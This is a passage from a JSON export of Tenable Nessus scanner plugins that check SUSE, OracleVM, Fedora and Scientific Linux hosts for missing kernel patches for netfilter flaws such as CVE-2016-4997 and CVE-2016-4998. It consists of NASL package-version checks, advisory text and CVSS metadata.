Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.59-60.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", 
reference:\"kernel-default-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.59-60.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.59-60.45.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:59", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 24682076] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682076] (CVE-2016-4997)\n (CVE-2016-4998)", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-26T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc 
(OVMSA-2016-0134)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-26T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2016-0134.NASL", "href": "https://www.tenable.com/plugins/nessus/93709", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0134.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93709);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2016-0134)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 24682076] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682076] (CVE-2016-4997)\n (CVE-2016-4998)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-September/000550.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be9fcee1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-61.1.10.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:14:23", "description": "The 4.5.7-202 kernel update contains a number of important security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing 
additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-15T00:00:00", "title": "Fedora 23 : kernel (2016-73a733f4d9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-5829", "CVE-2016-1237", "CVE-2016-4470", "CVE-2016-4998"], "modified": "2016-07-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-73A733F4D9.NASL", "href": "https://www.tenable.com/plugins/nessus/92256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-73a733f4d9.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92256);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1237\", \"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5728\", \"CVE-2016-5829\");\n script_xref(name:\"FEDORA\", value:\"2016-73a733f4d9\");\n\n script_name(english:\"Fedora 23 : kernel (2016-73a733f4d9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.5.7-202 kernel update contains a number of important security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-73a733f4d9\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-1237\", \"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5728\", \"CVE-2016-5829\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-73a733f4d9\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.5.7-202.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, 
"vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:49:22", "description": "Security Fix(es) :\n\n - A security flaw was found in the Linux kernel in the\n mark_source_chains() function in\n 'net/ipv4/netfilter/ip_tables.c'. It is possible for a\n user-supplied 'ipt_entry' structure to have a large\n 'next_offset' field. This field is not bounds checked\n prior to writing to a counter value at the supplied\n offset. (CVE-2016-3134, Important)\n\n - A flaw was discovered in processing setsockopt for 32\n bit processes on 64 bit systems. This flaw will allow\n attackers to alter arbitrary kernel memory when\n unloading a kernel module. This action is usually\n restricted to root-privileged users but can also be\n leveraged if the kernel is compiled with CONFIG_USER_NS\n and CONFIG_NET_NS and the user is granted elevated\n privileges. (CVE-2016-4997, Important)\n\n - An out-of-bounds heap memory access leading to a Denial\n of Service, heap disclosure, or further impact was found\n in setsockopt(). The function call is normally\n restricted to root, however some processes with\n cap_sys_admin may also be able to trigger this flaw in\n privileged container environments. (CVE-2016-4998,\n Moderate)\n\nBug Fix(es) :\n\n - In some cases, running the ipmitool command caused a\n kernel panic due to a race condition in the ipmi message\n handler. This update fixes the race condition, and the\n kernel panic no longer occurs in the described scenario.\n\n - Previously, running I/O-intensive operations in some\n cases caused the system to terminate unexpectedly after\n a NULL pointer dereference in the kernel. With this\n update, a set of patches has been applied to the 3w-9xxx\n and 3w-sas drivers that fix this bug. As a result, the\n system no longer crashes in the described scenario.\n\n - Previously, the Stream Control Transmission Protocol\n (SCTP) sockets did not inherit the SELinux labels\n properly. 
As a consequence, the sockets were labeled\n with the unlabeled_t SELinux type which caused SCTP\n connections to fail. The underlying source code has been\n modified, and SCTP connections now works as expected.\n\n - Previously, the bnx2x driver waited for transmission\n completions when recovering from a parity event, which\n substantially increased the recovery time. With this\n update, bnx2x does not wait for transmission completion\n in the described circumstances. As a result, the\n recovery of bnx2x after a parity event now takes less\n time.\n\nEnhancement(s) :\n\n - With this update, the audit subsystem enables filtering\n of processes by name besides filtering by PID. Users can\n now audit by executable name (with the '-F\n exe=<path-to-executable>' option), which allows\n expression of many new audit rules. This functionality\n can be used to create events when specific applications\n perform a syscall.\n\n - With this update, the Nonvolatile Memory Express (NVMe)\n and the multi- queue block layer (blk_mq) have been\n upgraded to the Linux 4.5 upstream version. Previously,\n a race condition between timeout and freeing request in\n blk_mq occurred, which could affect the\n blk_mq_tag_to_rq() function and consequently a kernel\n oops could occur. The provided patch fixes this race\n condition by updating the tags with the active request.\n The patch simplifies blk_mq_tag_to_rq() and ensures that\n the two requests are not active at the same time.\n\n - The Hyper-V storage driver (storvsc) has been upgraded\n from upstream. 
This update provides moderate performance\n improvement of I/O operations when using storvscr for\n certain workloads.", "edition": 18, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20160915)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "modified": "2016-09-16T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20160915_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/93557", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93557);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3134\", 
\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20160915)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A security flaw was found in the Linux kernel in the\n mark_source_chains() function in\n 'net/ipv4/netfilter/ip_tables.c'. It is possible for a\n user-supplied 'ipt_entry' structure to have a large\n 'next_offset' field. This field is not bounds checked\n prior to writing to a counter value at the supplied\n offset. (CVE-2016-3134, Important)\n\n - A flaw was discovered in processing setsockopt for 32\n bit processes on 64 bit systems. This flaw will allow\n attackers to alter arbitrary kernel memory when\n unloading a kernel module. This action is usually\n restricted to root-privileged users but can also be\n leveraged if the kernel is compiled with CONFIG_USER_NS\n and CONFIG_NET_NS and the user is granted elevated\n privileges. (CVE-2016-4997, Important)\n\n - An out-of-bounds heap memory access leading to a Denial\n of Service, heap disclosure, or further impact was found\n in setsockopt(). The function call is normally\n restricted to root, however some processes with\n cap_sys_admin may also be able to trigger this flaw in\n privileged container environments. (CVE-2016-4998,\n Moderate)\n\nBug Fix(es) :\n\n - In some cases, running the ipmitool command caused a\n kernel panic due to a race condition in the ipmi message\n handler. This update fixes the race condition, and the\n kernel panic no longer occurs in the described scenario.\n\n - Previously, running I/O-intensive operations in some\n cases caused the system to terminate unexpectedly after\n a NULL pointer dereference in the kernel. 
With this\n update, a set of patches has been applied to the 3w-9xxx\n and 3w-sas drivers that fix this bug. As a result, the\n system no longer crashes in the described scenario.\n\n - Previously, the Stream Control Transmission Protocol\n (SCTP) sockets did not inherit the SELinux labels\n properly. As a consequence, the sockets were labeled\n with the unlabeled_t SELinux type which caused SCTP\n connections to fail. The underlying source code has been\n modified, and SCTP connections now works as expected.\n\n - Previously, the bnx2x driver waited for transmission\n completions when recovering from a parity event, which\n substantially increased the recovery time. With this\n update, bnx2x does not wait for transmission completion\n in the described circumstances. As a result, the\n recovery of bnx2x after a parity event now takes less\n time.\n\nEnhancement(s) :\n\n - With this update, the audit subsystem enables filtering\n of processes by name besides filtering by PID. Users can\n now audit by executable name (with the '-F\n exe=<path-to-executable>' option), which allows\n expression of many new audit rules. This functionality\n can be used to create events when specific applications\n perform a syscall.\n\n - With this update, the Nonvolatile Memory Express (NVMe)\n and the multi- queue block layer (blk_mq) have been\n upgraded to the Linux 4.5 upstream version. Previously,\n a race condition between timeout and freeing request in\n blk_mq occurred, which could affect the\n blk_mq_tag_to_rq() function and consequently a kernel\n oops could occur. The provided patch fixes this race\n condition by updating the tags with the active request.\n The patch simplifies blk_mq_tag_to_rq() and ensures that\n the two requests are not active at the same time.\n\n - The Hyper-V storage driver (storvsc) has been upgraded\n from upstream. 
This update provides moderate performance\n improvement of I/O operations when using storvscr for\n certain workloads.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1609&L=scientific-linux-errata&F=&S=&P=1852\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8ec1283\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", 